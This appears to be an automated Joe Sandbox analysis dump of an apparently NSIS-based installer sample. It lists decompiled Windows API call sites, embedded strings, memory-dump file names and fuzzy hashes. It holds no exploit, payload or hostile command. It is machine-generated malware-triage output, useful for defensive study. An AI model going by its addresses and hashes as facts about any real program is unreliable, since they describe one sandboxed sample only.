                                                                                                                • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75573420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                                • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75573420), ref: 0040399F
                                                                                                                • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
                                                                                                                  • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403A5B
                                                                                                                • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                • API String ID: 1975747703-1115850852
                                                                                                                • Opcode ID: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                • Opcode Fuzzy Hash: d5c3abf15ba9808ba33f498f7a164742ef658a4c3e7242e85e78716b4e36e908
                                                                                                                • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                • String ID: F
                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                • Opcode ID: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                • Instruction ID: 6108585e84898fc0a566315ef3a84ca8793ce744416779fac967068cfe9173e2
                                                                                                                • Opcode Fuzzy Hash: 836f1adf353e2d325b24016f8fe56e8870fd4280f6f4b89fbeb337628f0c6723
                                                                                                                • Instruction Fuzzy Hash: 0E418A71800209AFCB058F95DE459AFBBB9FF44310F04842EF991AA1A0C738EA54DFA4
                                                                                                                APIs
                                                                                                                • lstrcpyW.KERNEL32(00430908,NUL,?,00000000,?,0040A300,00405F17,?,?), ref: 00405D93
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,0040A300,00405F17,?,?), ref: 00405DB7
                                                                                                                • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 00405DC0
                                                                                                                  • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                  • Part of subcall function 00405B8F: lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                • GetShortPathNameW.KERNEL32(00431108,00431108,00000400), ref: 00405DDD
                                                                                                                • wsprintfA.USER32 ref: 00405DFB
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,?,00431108,?,?,?,?,?), ref: 00405E36
                                                                                                                • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405E45
                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7D
                                                                                                                • SetFilePointer.KERNEL32(0040A578,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A578,00000000,[Rename],00000000,00000000,00000000), ref: 00405ED3
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405EE4
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EEB
                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                • API String ID: 222337774-899692902
                                                                                                                • Opcode ID: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                • Opcode Fuzzy Hash: f6fb36cc51022f7a2fd4840f1f55d7684ca34511e2c34b0b855416ece56c70d0
                                                                                                                • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404603
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0040462D
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 004046DE
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004046E9
                                                                                                                • lstrcmpiW.KERNEL32(00432EA0,0042D268,00000000,?,?), ref: 0040471B
                                                                                                                • lstrcatW.KERNEL32(?,00432EA0), ref: 00404727
                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404739
                                                                                                                  • Part of subcall function 0040577E: GetDlgItemTextW.USER32(?,?,00000400,00404770), ref: 00405791
                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,*?|<>/":,00000000,0043F000,75573420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 0040634C
                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                  • Part of subcall function 004062E9: CharNextW.USER32(0040A300,0043F000,75573420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406360
                                                                                                                  • Part of subcall function 004062E9: CharPrevW.USER32(0040A300,0040A300,75573420,00441800,00000000,0040327B,00441800,00441800,004034CC), ref: 00406373
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 004047FC
                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404817
                                                                                                                  • Part of subcall function 00404970: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                  • Part of subcall function 00404970: wsprintfW.USER32 ref: 00404A1A
                                                                                                                  • Part of subcall function 00404970: SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: A
                                                                                                                • API String ID: 2624150263-3554254475
                                                                                                                • Opcode ID: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                • Instruction ID: 407ae004ccebb682b028ef0dda1631611b85a4c4b0528499d59b6de2b9b5396a
                                                                                                                • Opcode Fuzzy Hash: 7533d7c2dc95967098a321fa3339fb28748da65ff8be7a50b8b52b895c48c278
                                                                                                                • Instruction Fuzzy Hash: 9CA171B1900208ABDB11AFA6CD85AAF77B8EF84314F10843BF601B72D1D77C89418B69
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405C2A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                Strings
                                                                                                                • (*B, xrefs: 00402E7C
                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                                                                                • soft, xrefs: 00402EDC
                                                                                                                • Null, xrefs: 00402EE5
                                                                                                                • Error launching installer, xrefs: 00402E3E
                                                                                                                • Inst, xrefs: 00402ED3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                • String ID: (*B$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                • API String ID: 4283519449-2478819026
                                                                                                                • Opcode ID: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                • Opcode Fuzzy Hash: af3239711416cc3f4489103c4f5988a16c87e5acef6a1f1d228726abe2e37e97
                                                                                                                • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD
                                                                                                                APIs
                                                                                                                • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040613A
                                                                                                                • GetSystemDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061B8
                                                                                                                • GetWindowsDirectoryW.KERNEL32(00432EA0,00000400), ref: 004061CB
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                • SHGetPathFromIDListW.SHELL32(?,00432EA0), ref: 00406215
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                • lstrcatW.KERNEL32(00432EA0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                • lstrlenW.KERNEL32(00432EA0,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,?), ref: 0040629E
                                                                                                                Strings
                                                                                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406186
                                                                                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040623E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                • API String ID: 900638850-730719616
                                                                                                                • Opcode ID: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                • Opcode Fuzzy Hash: b49515e533b40e1408f5d93883df29fa5190ace2cf2b8e5a57d609063371b42f
                                                                                                                • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                • String ID: jA$ jA$... %d%%
                                                                                                                • API String ID: 551687249-2167919867
                                                                                                                • Opcode ID: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                                • Opcode Fuzzy Hash: e07d926733e31303047b785d6e8e1ef749c31aa3f1888e26d22e6b527b659153
                                                                                                                • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2320649405-0
                                                                                                                • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                APIs
                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402688
                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,?,?,?,00000001), ref: 004026AB
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 004026C1
                                                                                                                  • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                • String ID: 9
                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                                • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                                • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(0042C248,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                • lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,755723A0), ref: 0040520F
                                                                                                                • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 2531174081-0
                                                                                                                • Opcode ID: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                • Opcode Fuzzy Hash: 8e6bf81ce48c4b2cdbfca5526b135b5755e0331aa1f53bcdb355af2f73056803
                                                                                                                • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                • String ID: f
                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                APIs
                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                • MulDiv.KERNEL32(?,?,?), ref: 00402D4D
                                                                                                                • wsprintfW.USER32 ref: 00402D5D
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                Strings
                                                                                                                • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405C2A: GetFileAttributesW.KERNEL32(00000003,00402E2E,00442800,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
